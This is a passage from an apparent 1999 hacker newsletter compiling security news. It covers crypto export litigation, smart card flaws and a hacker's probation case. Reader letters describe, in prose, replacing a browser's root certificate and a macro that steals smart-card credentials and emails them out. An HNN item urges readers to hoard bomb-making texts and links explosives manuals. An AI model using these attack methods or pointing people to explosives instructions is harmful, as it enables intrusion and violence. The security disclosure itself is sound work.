25093+0+wAAA+fiber-optic%7Econfessional Visa has issued a draft of the "Visa Smart Card Protection Profile," as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments. http://www.visa.com/nt/chip/accept.html http://jya.com/drpp-v.pdf The Visa document references the Common Criteria: http://csrc.ncsl.nist.gov/cc/ The IC2000 report on communications interception and ECHELON, the U.S. satellite surveillance network, was approved as a working document by the Science and Technology Options Assessment Panel of the European Parliament (STOA) at their meeting in Strasbourg on 6 May 1999. The document is public, and very interesting. Report: http://www.iptvreports.mcmail.com/stoa_cover.htm http://jya.com/ic2000.zip News story: http://www.wired.com/news/news/politics/story/19602.html A man has been sentenced to seven and one half years for hacking $6M out of slot machines. http://www.wired.com/news/news/technology/story/19433.html ** *** ***** ******* *********** ************* Federal Appeals Court Agrees that Encryption Export Rules are Unconstitutional The story so far: Dan Bernstein wanted to publish the details and source code to Snuffle, an algorithm of his. Export rules prevented him from doing so. He took this to court. About a year and a half ago, Judge Patel agreed with him and ruled the export rules unconstitutional. The government requested a stay, which was granted. The case was appealed to the Federal Ninth Circuit Court of Appeals... ...which just agreed with Judge Patel's decision. Briefly, the Court agreed that source code can be (though isn't always) "expressive," and thus qualifies as speech for the purpose of the First Amendment. Thus, the Export Administration Regulations (EAR) is a prior restraint on free speech. While such things can be legal, they bear a heavy burden; EAR does not meet that burden, because (among other things) it grants unbridled discretion to the government, it provides no firm time limits for the process, and it bars judicial review. Despite the fact that their reasoning was narrowly focused on expressive source code, they struck down the entire rule on crypto export because the rule doesn't distinguish between expressive source, functional source, and object code, and they can't (and shouldn't) do a line-by-line rewrite of the EAR. They also said that government efforts to control cryptography, in addition to being a First Amendment issue, may also be in conflict with the Fourth Amendment, the right to speak anonymously, the right against compelled speach, and the right to informational privacy. This does not mean that it is suddenly legal to export cryptography out of the U.S. Judge Patel issued declaratory and injunctive relief, but it was almost immediately stayed. The Ninth Circuit Court of Appeals affirmed her decision, but that Court's mandate does not issue until the time for petitioning for rehearing runs (14 days). This will almost undoubtedly be stayed, as the government asks the Supreme Court to hear the case. The conservative among us will wait before exporting source code. Wired articles: http://www.wired.com/news/news/politics/story/19553.html?wnpg=1 http://www.wired.com/news/news/politics/story/19571.html http://www.wired.com/news/news/politics/story/19605.html The decision: http://jya.com/bernstein-9th.htm An excellent summary and analysis: http://www.law.miami.edu/~froomkin/bernstein99.htm ** *** ***** ******* *********** ************* The Doghouse -- Novell NetWare's Remote Passwords Novell NetWare 5 (and 4.11 and 4.2) has a feature that allows administrators to remotely manage Novell servers. These administrative accounts are protected by passwords, and the password are encrypted on the servers. Unfortunately, the encryption algorithm doesn't work. According to a hacker named TheRuiner, the password file is only protected with some obfuscation, bit realignment, subtraction, value substitution, and an XOR cipher. It's pretty trivial to break, and all it really took was for someone to reverse-engineer the code and see exactly how it worked. This isn't rocket science, guys. Password protection is a solved problem: use a strong hash function. I'm not sure why Novell wasn't paying attention. News story: http://www.infoworld.com/cgi-bin/displayNew.pl?/security/990426sw.htm Details are at: http://oliver.efri.hr/~crv/security/bugs/Others/nware12.html ** *** ***** ******* *********** ************* U.S. Crypto Legislation Update Once again, the U.S. Congress is trying to enact legislation to relax export controls on computer hardware and software that include encryption. The hope is that actual laws will eventually replace the ITAR regulations, which are not laws and have never been voted on. On March 24, the House Judiciary Committee approved H.R. 850, the "Security And Freedom through Encryption" (SAFE) Act. We like this bill; it generally relaxes export controls on encryption software. On the minus side, it also includes a controversial provision that creates a new criminal offense for using encryption during a crime. But on the plus side, the Committee rejected an attempt by Rep. Bill McCollum (R-FL) to introduce an amendment that would have limited relaxation to those encryption products that have key-escrow (or whatever they are calling it these days). The bill is sponsored by Congressman Robert Goodlatte (R-VA) and Congresswoman Zoe Lofgren (D-CA) (both great people who deserve our support) and currently has 251 co-sponsors, including the Republican and Democrat leaders. Republican leaders sent a "Dear Colleague" letter to all members of Congress last week urging passage of the bill. Unfortunately, it has now been referred to the Commerce, International Relations, Armed Services, and Intelligence Committees for further review. If you remember back to 1997, the House Armed Services and Intelligence Committees both revised a similar bill -- at the request of the FBI -- to impose restrictions on crypto products; their efforts to pass that gutted bill were defeated with help from industry and public interest groups. Majority Leader Dick Armey has told Rep. Goodlatte that he expects the legislation to be voted on by the House by summer; we'll have to wait and see. There is also some progress in the Senate this year. In a surprising turnaround, Senator John McCain (R-AZ) has reversed his previous support for domestic encryption restrictions and introduced a bill to slightly relax export controls. His new bill, S. 798, "Promote Reliable On-Line Transactions to Encourage Commerce and Trade" (PROTECT) Act of 1999 relaxes export controls on products with 64-bit keys or less. Restrictions are also relaxed on publicly traded companies, regulated or regularly audited companies (such as banks or insurance companies), subsidiaries of U.S. companies and strategic partners, online merchants, and governments in NATO, OECD and ASEAN (a weird choice). Products that have longer keys than 64 bits can be exported if a new Encryption Export Advisory Board and the Secretary of Commerce approve the exports after finding that "the product or service is...generally available, publicly available; or an encryption product utilizing the same or greater key length or otherwise providing comparable security is, or will be within the next 12 months generally or widely available outside the United States from a foreign supplier." Decisions will be subject to judicial review. The bill requires the National Institute of Standards and Technology to finish the Advanced Encryption Standard (AES) selection by January 1, 2002. After the AES is selected, products that incorporate the AES or have an equivalent strength may be exportable without a license in most cases. The bill also prohibits mandatory access to encryption keys or key recovery information by the United States government or the government of any state. However, it also contains provisions that require NIST to assist law enforcement in enhancing access to cryptography and intrusion detection systems. The bill has been referred to the Senate Commerce Committee, where Senator McCain is Chairman. It is also co-sponsored by Senators Leahy (D-VT), Burns (R-MT), Kerry (D-MA), Abraham (R-MI), and Wyden (D-OR). It promises to be an interesting year in Congress. SAFE Act: http://thomas.loc.gov/cgi-bin/query/z?c106:H.R.850.IH: PROTECT ACT: http://thomas.loc.gov/cgi-bin/query/z?c106:S.798.IS: (This article was co-written with David Banisar.) ** *** ***** ******* *********** ************* Counterpane Systems News Rootfest '99. Bruce Schneier will be speaking at RootFest, a hackers' convention on 21-23 May 1999, in Minneapolis. http://www.rootfest.org/ NetSec '99. At 8:00 AM on 15 June, Bruce Schneier will give the keynote speech at NetSec '99 in St. Louis. Schneier will also be speaking about securing legacy applications at 2:00 that afternoon. http://www.gocsi.com/conf.htm ** *** ***** ******* *********** ************* Factoring with TWINKLE At Eurocrypt '99, Adi Shamir presented a new machine that could increase our factoring speed by about 100-1000 times. Called TWINKLE (The Weizmann INstitute Key Locating Engine), this device brings 512-bit keys within the realm of our ability to factor. The best factoring algorithms known to date all work on similar principles. First, there is a massive parallel search for equations with a certain relation. This is known as the sieving step. Then, after a certain number of relations are found, there is a massive matrix operation to solve a linear equation and produce the prime factors. The first step can easily be paralleled -- recently, 200 computers worked in parallel for about four weeks to find relations to help factor RSA-140 -- but the second has to be done on a single supercomputer: it took a large Cray about 100 hours and 810 Mbytes of memory to factor RSA-140. Shamir conceptualized a special hardware device that uses electro-optical techniques to sieve at speeds much faster than normal computers. He encodes various LEDs with values corresponding to prime numbers, and then uses it to factor numbers. The machine reminds me of the famous Difference Engine of the 1800s. Once the engineering kinks are worked out -- and there are considerable ones -- this machine will be as powerful as 100-1000 PCs for about $5000. The basic idea is not new; a mechanical-optical machine built by D.H. Lehmer in the 1930s did much the same thing (although quite a bit more slowly). As far as we know, Shamir's machine is never been built. (I can't speak for secret organizations.) As I said, Shamir presented a conceptualization and a sketch of a design, not a full set of engineering blueprints. There are all sorts of details still to be figured out, but none of them seem impossible. If I were running a multi-billion-dollar intelligence organization, I would turn my boffins loose at the problem. The important thing to note is that this new machine does not affect the matrix step at all. And this step explodes in complexity for large factoring problems; its complexity grows much faster than the complexity of the sieving step. And it's not just the time, it's the memory requirements. With a 1024-bit number, for example, the matrix step requires something like ten terabytes of memory: not off-line storage, but real computer memory. No one has a clue how to solve that kind of problem. This technique works just as well for discrete-logarithm public-key algorithms (Diffie-Hellman, ElGamal, DSA, etc.) as it does for RSA, although it is worth noting that the matrix problem is harder for discrete-log problems than it is for factoring. The technique does not apply to elliptic-curve-based algorithms, as we don't know how to use the sieving-based algorithms to solve elliptic-curve problems. In "Applied Cryptography," I talked about advances in factoring coming from four different directions. One, faster computers. Two, better networking. Three, optimizations and tweaks of existing factoring algorithms. And four, fundamental advances in the science of factoring. TWINKLE falls in categories one and three; there is no new mathematics in this machine, it's just a much faster way of doing existing mathematics. Shamir's contribution is obvious once you understand it (the hallmark of a brilliant contribution, in my opinion), and definitely changes the landscape of what public-key key sizes are considered secure. The moral is that it is prudent to be conservative -- all well-designed security products went beyond 512-bit moduli years ago -- and that advances in cryptography can come from the strangest places. Shamir's paper: http://jya.com/twinkle.eps The RSA Data Security opinion: http://www.rsa.com/rsalabs/html/twinkle.html. ** *** ***** ******* *********** ************* Comments from Readers From: pgut001@cs.auckland.ac.nz (Peter Gutmann) Subject: Attacking Certificates with Computer Viruses >So if you're a paranoid computer-security professional, >the obvious question to ask is: can a rogue piece of >software replace the root-level certificates in my browser >and trick me into trusting someone? Of course it can. You don't even need rogue software, all you need is Internet Explorer. Try this: Using your favorite certificate toolkit, create a CA root certificate which is identical to an existing one (except for the key) and stick it in a web page. Click on the link with MSIE. You'll be presented with a dialog telling you you're about to accept a new certificate from, for example, "Verisign Class 1 Public Primary Certification Authority". Once you've clicked OK (as virtually all users will), you've replaced the standard CA root with your own one, and can use it to certify rogue servers, CA's, email, viruses, and whatever else you feel like. There's no warning presented by MSIE, it just quietly replaces the existing cert. (Hint: You may want to test this with one of the lesser-used CA's rather than Verisign, because even ignoring the security implications it's a significant denial-of-service attack. This hole may have been fixed in newer versions of MSIE, but it worked fine in 3.02, which is the last version which doesn't try to take over your machine when you install it). From: Ed Gerck Subject: Re: Smart Card Threats I enjoyed reading your paper on smart-card security issues (Cryptogram Apr/15/1999). I find it specially useful since it provides yet more examples where trust cannot be seen as an objective property of a system, not even for some of its parts. I believe the same applies to all systems, though -- however unperceived in most cases. Smart-cards are thus IMO no better and no worse in principle than a computer on the Net. Trust is essentially subjective and thus any recognizable part of any system can operate within its own and different trust truth-conditions -- potentially leading to different trust-values when in interaction with other parts, perhaps from other systems and also differently for each other part, history, and time. At the end, the main question is thus not whether it is a smart-card or a computer on your desk -- but whether you can rely upon it for your decisions (i.e., trust it within a specific extent and epoch, for specific trust-points). Which may be easier to accept for a smart-card that you always carry with you in contrast to a computer that you never see, such as a server -- but not necessarily, as your paper exemplifies. I would like to comment also on another part of your newsletter, where you have the title "Trusting the Known" -- since, of course, no one can trust the unknown. IMO, the gist of your text is "Trusting with Qualification" which introduces the discussion on the *degree* of such qualification as you then proceed to do. I also note that it is possible to trust without qualification on the trusted matter itself, even though you must know it -- and that such may even apply to what you analyzed, as when a spy in a spy-ring trusts the key handed down by the spymaster, in an objective way as an "authorization" and entirely based on his trust on the spymaster... not on the key's qualifications. From: jmm@elegant.com (John Macdonald) Subject: "In cryptography, there is security in following the crowd" Careful how you phrase that. As written, it could easily be used to justify choosing Microsoft PPP rather than IPSec because that is where "the crowd" has lead. Nobody who reads and understands the article would consider the masses generally unknowledgeable about cryptography to be the right "crowd" to follow of course, but I shudder to think of this article being read by a marketing droid looking for the catch-phrases for his next ad campaign, or a purchasing agent being challenged about an all-Microsoft buying policy. From: hecker@netscape.com (Frank Hecker) Subject: Re: CRYPTO-GRAM, April 15, 1999 >Other Internet protocols -- S/MIME, SSL, etc. -- take a more >hierarchical approach. You probably got your public key >signed by a company like Verisign. A Web site's SSL public >key might have been signed by Netscape. >This attack isn't without problems. If a virus replaces the >root Netscape certificate with a phony one.... For the record, Netscape does not sign web sites' public keys (i.e., act as a Certificate Authority for them); I don't believe Netscape has ever performed this service. Thus there is no "root Netscape certificate" included in the Netscape Navigator and Netscape Communicator products, if by that you mean a certificate for a hypothesized Netscape CA. Netscape Navigator and Netscape Communicator as shipped do include root CA certificates for a number of public CA services, and we recommend that our customers use those services (unless they wish to act as their own CA). This doesn't of course change the underlying argument of your article, concerning the vulnerability to replacement of the include root certificate list; I just wanted to correct a minor error of fact. From: "hans@netman.se" Subject: Smart-Card Flaws For the last 2.5 years I've been responsible for the security issues when implementing a large Smart Card based authorization concept for Windows NT 4.0 here in Sweden and here are 3 major flaws I've encountered when dealing with smart cards: 1) When connecting to a NT server your user name, password and X509v3 certificate are sent to the server. The server starts a challenge response using the public key in the certificate and encrypts a random value. The encrypted random value and the server certificate are then sent to the smart card and decrypted with the corresponding private key. Then the smart card encrypts the random value with the server's public key in the server certificate and sends it back to the server, which compares the two values. Since there is no connection between the value in the X509 certificate (subject field and Common Name) and the user ID you may enter some other person's ID and password which are sent with your certificate. So the strong authentication will begin using your Public and private RSA keys but you will get the other person's privileges and access rights! 2) On an RSA based smart card you usually store the user id and password on the data area (SSO table = Single Sign On Table) -- the problem lies in the fact that the smart cards offered today are limited in storage data, such as certificates and user IDs and passwords, to 8K maximum. (You may find cards on the market that can store more than 8K data but you can't buy them yet.) So if we use certificates with RSA based keys stored in them, which are 1024 bits long, you may only have 2 certificates and 2 corresponding private keys. If we use RSA based keys stored in a smart card that are 512 bits long, we can store 3 certificates in them. And since 512 bit RSA keys are in the Wassenaar agreement and you may export them, you can't trust them :-). So we used 1024 bits keys instead and used them for authentication and encryption. So the following will then happen. You enter the PIN that opens the card AND opens for usage of the certificate and private key for authentication/encryption since we want to do a strong authentication of the user. I can then decrypt anything that the user of the smart card has encrypted since the usage of the private key is opened by the user when he enters his PIN! If I can get the user to execute a Trojan horse program the user will not even know that I'm decrypting something he encrypted with his private key! Therefore you can't encrypt the user id and the password stored on the smart card! So I can read this from the smart card and get user id and the corresponding password and email it to me! (I've done this once using just Visual Basic for Application and a macro stored in the normal.dot) 3) If we do a challenge response in a NT environment the server needs to know which work station/server he is talking to. So in your case the server program used WINS to get the IP-address from the workstation name. This opened to a nice attack: The user logged in on a NT workstation using his smart card and was authenticated by challenge response. We sent a email to the user that included a macro in the normal.dot and got the workstation's name from the workstation, and user id and password from the smart card. We then got another NT workstation and named it as the user's workstation name and tried to get a connection to a disk on the NT server. We were prompted for user ID and password, which we entered and voila! We got access to the disk! The server in this case got the workstation name, the user id and password and used WINS to find the corresponding IP address for that workstation name. Then the server did a strong authentication on the IP address that the server got from WINS. That IP address was not our machine's IP address, it was the user's IP address! In the NT security log we could read that the user logged in to that disk and that he was authenticated by the use of strong authentication. So the question is: Can you rely on Smart Cards? And my answer is: Yes, if you know what they can do and what they can't! ** *** ***** ******* *********** ************* CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. Please feel free to forward CRYPTO-GRAM to colleagues and friends who will find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety. CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. Counterpane Systems is a six-person consulting firm specializing in cryptography and computer security. Counterpane provides expert consulting in: design and analysis, implementation and testing, threat modeling, product research and forecasting, classes and training, intellectual property, and export consulting. Contracts range from short-term design evaluations and expert opinions to multi-year development efforts. http://www.counterpane.com/ Copyright (c) 1999 by Bruce Schneier @HWA 40.0 [ISN] Why i'm a security pessimist ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Traumatic Dog Why I'm a Security Pessimist URL: http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3377.html Jesse Berst, Editorial Director ZDNet AnchorDesk Wednesday, May 12, 1999 We're still in the primitive days of the Internet. So we still expect some security problems. And we assume they'll get better. Right? Wrong. The security problem is getting worse. Headlines tell me Internet security lapses are becoming more common. Even the White House isn't safe. Click for more. And Melissa showed us viruses are growing more wily. We're all at the mercy of corner-cutting software vendors, inexperienced e-tailers and smart-ass programmers. WHY YOU ARE MORE VULNERABLE There's no single culprit. Much of it has to do with changing times: As the Internet is more widely used, the potential for good and bad increases By expanding networks, companies create more opportunity for security breaches As competition gets more intense, vendors push products out the door faster As product complexity increases, bugs are more likely As ecommerce explodes, vendors are rushing to set up shop online WHERE YOU ARE MOST VULNERABLE Computer users are being impacted at work, at home, online: The number of software bugs tracked in the BugNet database grew nearly 20-fold in the past five years. The bug explosion costs employers millions of hours in lost productivity The insidious Melissa virus, which infected over 100,000 computers in the U.S., was a nuisance; weeks later the destructive CIH virus crashed more than half a million computers in South Korea and Turkey E-businesses are unwittingly exposing private customer information, including names, addresses and credit card info; last month 100 sites with improperly installed shopping carts were identified HOW TO LIMIT YOUR VULNERABILITY You can't prevent bugs, viruses and inept e-tailers. But there are ways to protect yourself. Your computer. If events of recent months didn't persuade you to obtain anti-virus software for your PC, maybe this quick click to free, five-star anti-virus downloads will do the trick. Click for more. Bookmark the Help Channel's Bug section for the latest bug alerts, patches and workarounds for your software and hardware. Click for more. Your company. PC Magazine Labs evaluated three families of antivirus products that protect every major LAN component. Click for more. If your company conducts business over the Internet, two major security holes you need to plug are DNS spoofing and attacks on dial-up connections. Click for more. Your personal information. Make sure before you relinquish any personal information the Web site has the TRUSTe seal of approval and/or a privacy statement you can live with. Click for more. Or become a stealth browser; the Help Channel details how to maintain a low profile on the Web. Click for more. For even more resources, visit the Security and Privacy Briefing Centers I've linked in the sidebar. And please use the TalkBack button to tell me if you agree things are getting worse, not better. You're also welcome to join the discussion at my Berst Alerts forum. [snip..] -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 41.0 Bombs Off The Net! ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Bombs Off the Net, Senate Says contributed by g0rn New legislation recently tacked onto the Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act will make 'bomb-making information' on the net illegal. The law would also apply to any form of distribution--books, magazines, or videos. Well we suggest that you get copies of any information you feel may be threatened now and sock it away. C|Net http://www.news.com/News/Item/0,4,36785,00.html?st.ne.fd.mdh.ni textfiles.com- Get 'em while you can http://www.textfiles.com/ Bombing victims held a press conferance yesterday to plead with Internet companies to purge or block Web sites that carry recipes for building bombs. How come no one is protesting the local library or the High School chemistry book? Why does everyone always pick on the internet? Nando Times http://www.techserver.com/story/body/0,1634,50706-81476-578139-0,00.html Wired http://www.wired.com/news/news/politics/story/19785.html Late Update This information is fast disapearing from the web. The above site textfiles.com has already removed the relevent sections (at least temporarily) We suggest you grab what you can while you can. The Anarchists Cookbook http://www.amazon.com/exec/obidos/ASIN/0962303208/thehackernewsnet Highly Explosive Pyrotechnic Compositions http://www.amazon.com/exec/obidos/ASIN/0873648277/thehackernewsnet Homemade C-4 : A Recipe for Survival http://www.amazon.com/exec/obidos/ASIN/0873645588/thehackernewsnet Improvised Explosives : How to Make Your Own http://www.amazon.com/exec/obidos/ASIN/0873643208/thehackernewsnet 303.org has graciously mirrored the missing sections from textfiles.com. They are still working on it but some stuff is available now. 303.org http://www.303.org/explosives/ The stories; C|Net; Senate blasts bomb-making info on Net By Courtney Macavinta Staff Writer, CNET News.com May 19, 1999, 1:00 p.m. PT Distributing bomb-making information on the Net would be illegal in most cases under Senate legislation being debated in the wake of the killings at Columbine High School in Littleton, Colorado, and a rash of subsequent threats at campuses around the country. With a 85-13 vote, Sens. Dianne Feinstein (D-California) and Orrin Hatch (R-Utah) successfully tacked an amendment onto the Violent and Repeat Juvenile Offender Accountability and Rehabilitation Act yesterday. The provision prohibits teaching or demonstrating how to make explosives with the "intent" that the information will be used to commit a federal crime. The law would apply to any form of distribution--books, magazines, or videos, for example. However, like measures Feinstein has pushed in the past, the Net is once again the focal point. That's because the two teenagers, who witnesses say killed 13 people in Littleton, reportedly documented their weapon-making and massacre plans online. "The youngsters in Colorado who perpetrated the crime indicated they got the formula for the pipe bombs directly from the Internet," Feinstein stated on the Senate floor. The same bill, which is still being debated today, also would require that Net access providers offer customers filtering technologies and bans online gun or explosives sales that would violate existing laws. But First Amendment experts are alarmed by the bomb-making provision. They say it could apply to people who aren't inciting violence. "If a high school chemistry teacher posts online material for a course that he knows could be used to build a device, it's entirely possible that someone unknown to the teacher will use it to commit a federal crime of violence," said Barry Steinhardt, associate director of the American Civil Liberties Union. "That is problematic, because on the Net you can't know the intent of your audience." But Hatch says to be prosecuted, publishers would have to encourage violence along with the posting of bomb-making data. The Senator pointed to the Animal Liberation Front's Web site as an example of the type of material he wants to outlaw. The site has a pamphlet, Final Nail #2, which includes diagrams about how to build devices to set off fire alarm sprinklers or to damage stores that sell fur coats. "It is a detailed guide to terrorist activities," Hatch said on the Senate floor. "Why someone feels the need to put such harmful material on the Internet is beyond me; there certainly is no legitimate need for our kids to know how to make a bomb," he added. "[If a] person crosses the line to advocate the use of that knowledge for violent criminal purposes, or gives it out knowing it will be used for such purposes, then the law needs to cover that conduct." Although the Hatch-Feinstein amendment targets only those whose "intent" is to incite violence, free speech watchdogs today echoed concerns they have with a recent federal court decision in Oregon that held online speakers liable for inciting offline violence. In that case, U.S. District Judge Robert Jones issued a permanent injunction prohibiting a group of abortion foes from distributing "wanted" posters that list abortion providers' personal information and redistributing the data on sites such as the Nuremberg Files, which called for the "baby butchers" to be "brought to justice." The case is under appeal. "What remains to be resolved by the courts is 'how far is too far' in making information available that could be used in the commission of a crime," said David Sobel, general counsel at the Electronic Privacy Information Center. "I have concerns about how the [bomb-making] language might be applied," he added. "Provisions like this are subject to abuse in the hands of an overzealous prosecutor." Still other legal experts said the amendment likely would pass constitutional tests. "There are serious constitutional questions about regulating information about making bombs," said Lance Rose, author of NetLaw. "If this law is passed and it survives any constitutional challenges, there will be a fundamental proposition that you can regulate bomb information at least sometimes." But Rose added: "It's a slippery slope. Once you have a law like this in place, the question is, 'How far can they go?'" Despite the free speech debate, legal experts say lawmakers' campaigns to rid the Net of bomb-making information won't necessarily help to curb access to such information. "There is ample information available about this offline, including information from the Agricultural Department and U.S. military training manuals," the ACLU's Steinhardt said. "The Net is a global medium--a lot of information also comes from outside of the United States. This measure is totally futile." -=- Wired; -=- Victims Want Bomb Sites Off Web Reuters 5:50 p.m. 19.May.99.PDT The brother of convicted Unabomber Theodore Kaczynski, a victim of one of his bombings, and the mother of a victim of the Oklahoma City bombing made a plea on Wednesday for Internet companies to purge or block Web sites that carry recipes for building bombs. David Kaczynski, Unabomber victim Gary Wright, and Marsha Kight, whose daughter died in the Oklahoma City blast, appeared at a news conference to ask America Online, Microsoft, Walt Disney, and Yahoo to police the vast array of Web sites on a voluntary basis. Access to violent sites, particularly by children, has come under sharp focus since the Littleton, Colorado high school shootings, where one of the teenage killers detailed the building of pipe bombs on the Web a year earlier. David Kaczynski, who has made few public statements since he exposed his brother as the Unabomber, said that he saw a parallel between his and his wife's decision to turn his brother in to authorities and the issue that faces Internet companies. "It was absolutely agonizing for us to make the decision to turn in my brother," said Kaczynski, a social worker in upstate New York. "I think it's much less agonizing for Internet companies, and they ought to do it." Wright, a Salt Lake City software executive, was injured when he picked up a Unabomber bomb behind a computer store where he worked in 1987. Kight's 23-year-old daughter was among the 168 people who died in the 1995 bombing of the Oklahoma City federal office building. Writing letters to AOL, Microsoft, Disney - which is part owner of the Go Network -- and Yahoo, the victims and a New York-based group called the Centre for Community Interest want host companies to scan for and delete bomb-making instructions and to block access to such sites through search engines. Industry spokesmen said that companies do what they can, but they questioned whether it is possible to scan the content of every Web site, particularly if a bomb recipe, for example, contains just chemical ingredients and no violent or hateful language. Dennis Saffran, head of CCI, which also has defended pornography-shop restrictions and panhandling bans, said that the call would not violate the constitutional right to free speech because they are seeking the voluntary cooperation of private companies. But, he added, limited government regulation might be needed if companies don't participate on a voluntary basis. "We're giving every troubled kid out there the tools to become a Tim McVeigh or a Ted Kaczynski," he said. @HWA 42.0 Dark Spyre may end up in jail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Dark Spyre May end up in Jail contributed by erewhon A year shy of completing his probation after being indicted on two counts of felony theft in January 1995, Dark Spyre (Ryan David Schwartz) may soon end up behind bars. For several weeks in 1993-94 Dark Spyre worked on breaking the codes of a long-distance phone company based in Mississippi. Part of his sentance for these crimes was probation. Now his probation may be revoked. The Assistant District Attorney claims that he violated his probation when he used a computer. Dark Spyre claims that the closest he has gotten to a computer is when he asked a schoolmate to type a paper for him. Allowing someone else to use a computer on Schwartz's behalf, is the same as if Schwartz had used it, the DA said. ComputerNews Daily http://199.97.97.16/IMDS%7CCND7%7Cread%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1297-0139-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/1301-0143-pat_nytimes%7C/home/content/users/imds/feeds/nytsyn/1999/05/18/cndin/ Former Hacker in a Probation Struggle PATTI MUCK c.1999 Houston Chronicle SUGAR LAND, Texas -- From the blackness of his bedroom, Dark Spyre would be awakened by a desk lamp clicking on. Hooked to his computer, it would signal him - sometimes in the middle of the night - that a fellow hacker was ready to begin. For several weeks in late 1993 and early 1994, Ryan David Schwartz, alias Dark Spyre, was a high school senior by day, a computer hacker by night. Breaking the security code of a long-distance phone company based in Mississippi, he was able to charge thousands of dollars worth of computer bulletin board calls to the company. When Sugar Land police showed up at the Houston-area home he shared with his grandparents and mother in March 1994, Schwartz confessed to hacking. They took his computer, all of the components, even the desk lamp. Indicted on two counts of felony theft a month after his graduation, he pleaded guilty in January 1995. He was sentenced to five years' deferred adjudication - a punishment that would expunge the conviction from his record if successfully completed - plus 450 hours of community service, court costs and nearly $5,000 restitution. Now, just a year shy of completing his probation, Schwartz faces a motion to revoke the probation. Revocation could send him to prison and end his pursuit of a degree at Baylor University in Waco. From Schwartz's perspective, the Fort Bend County District Attorney's Office set him up for failure from the start and has treated him more like a violent criminal than an intelligent young man who made a mistake and was willing to pay for it. From the prosecutor's perspective, Schwartz has been thumbing his nose at the court and deserves to be punished. Not only has he ignored probation conditions that included orders not to use a computer, but he has abused a string of second chances, Assistant District Attorney Mike Elliott said. ``It's a shame in a lot of ways, because he's a bright kid,'' said Elliott, who, coincidentally, is the computer expert in his office. ``But he just can't leave it alone. He's got an addiction.'' Schwartz denied violating his probation. He insisted that he has been walking the straight and narrow - working nearly full-time at a Service Merchandise store in Waco, attending classes at Baylor and frantically rushing back to Fort Bend County every Friday afternoon to meet with his probation officer. Sugar Land, an affluent community just outside of Houston, is about 150 miles from Waco. He said he has not used a computer and that fellow students have typed papers for him, which, according to his understanding of the probation, was allowed. Elliott said the ruling was clear: Schwartz is forbidden from using a computer, period. Allowing someone else to use a computer on Schwartz's behalf, and using Schwartz's password, is the same as if Schwartz had used it, Elliott said. ``I'm just trying to get school done and get a degree and get a career going,'' said Schwartz, now 23. Elliott contended that Schwartz doesn't merit pity. Not only did Schwartz ignore a warning from LDDS Metromedia Communications, the long-distance company, to stop hacking long before the criminal charges were filed, but he also violated his probation by accessing the Internet and using a computer, the prosecutor said. ``It's a game to them,'' he said of computer hackers. ``They don't see the danger, the real harm in what they're doing. Many people are under the misconception that if you do a crime on the computer, it's not that bad, like murdering somebody. ``But it is a crime - a felony crime. How many people's phone bills went up because of acts he and others did? Everybody pays for his kind of crime.'' Schwartz's probation problems started early, when he contended that his severe asthma prevented him from the lawn-cutting and outdoor maintenance chores that are typical of community service. He had enrolled at the University of Houston in August 1994 and attended classes there through May 1995. After his enrollment at Baylor in July 1995, the community-service hours became more difficult to complete. In September 1997, the first motion to revoke Schwartz's probation was filed, alleging that he had failed to report to the probation department in February, May and June 1996 and that he had failed to perform community service. A probation department report said Schwartz hadn't done service for a year. It also maintained that, even after being referred to light duty because of his asthma, Schwartz failed to report for community service in Waco. He denied that, saying he had reported but wasn't given an assignment compatible with his health. At one point, he was instructed to clean out a dark, cellarlike room at a Waco charitable organization, he said. It was, he said, infested with rats, an environment his asthma was unable to tolerate. He kept the job for only one day. A promised assignment in a library never materialized. ``I was willing to do the work,'' he said. After a hearing in December 1997, state District Judge Bradley Smith did not revoke his probation but made several changes in its terms. Schwartz was given an additional 600 hours of community service, to be completed by Jan. 1, 1999. And he was forbidden from operating a computer without written court permission. Schwartz took off a semester and reported for work daily at the Precinct 4 justice-of-the-peace office to complete his community service. His mother, Linda Schwartz, a secretary, paid the restitution, and his grandparents, Greta and Izu Schwartz, 71 and 73 respectively, helped pay lawyer and bond fees. Already, the family had stacked up about $50,000 in payments to bail bondsmen and lawyers. The family thought that the ordeal was nearing an end and that Schwartz could finish college and get his degree in finance and management information systems. He wants to have a career in financial consulting or investments. Schwartz applied for early termination of his probation after he completed his community service, but was turned down. Although the court granted his request to return to Baylor, he was told to report to the probation office in Richmond at 4 p.m. every Friday. Schwartz said he did his best to comply, leaving as soon as classes or work were through and driving hard to make the deadline. But he was late three times, clocking in at 4:25 p.m. one time, at 4:31 p.m. another time and at 4:16 p.m. another. After using several lawyers, the family hired Houston attorney Dick DeGuerin to try again to get the probation terminated early. Schwartz obtained a letter from an associate dean at Baylor, saying he lacked 39 hours to graduate and would have to have access to a computer to complete his course work. An assistant professor at Baylor wrote to Judge Smith, asking that Schwartz be allowed to use a computer ``and move on to a career in business.'' While supportive letters were filling Schwartz's court file, Elliott was getting tips that the probationer was actively using the computer, the Internet and e-mail at Baylor. The second motion to revoke his probation was filed in March. It is set for a June 10 hearing before Smith, who has a reputation around the courthouse of being tough on wayward probationers. The Schwartz family views the latest development as continued torture, referring to Elliott as a persecutor instead of a prosecutor. ``The goal is to put him in jail. That's what they want,'' said Linda Schwartz, 47. ``He was young and foolish,'' she said, but he has paid for his mistake. ``Now we don't know what to do. We're going crazy.'' Elliott, meanwhile, is preparing for the 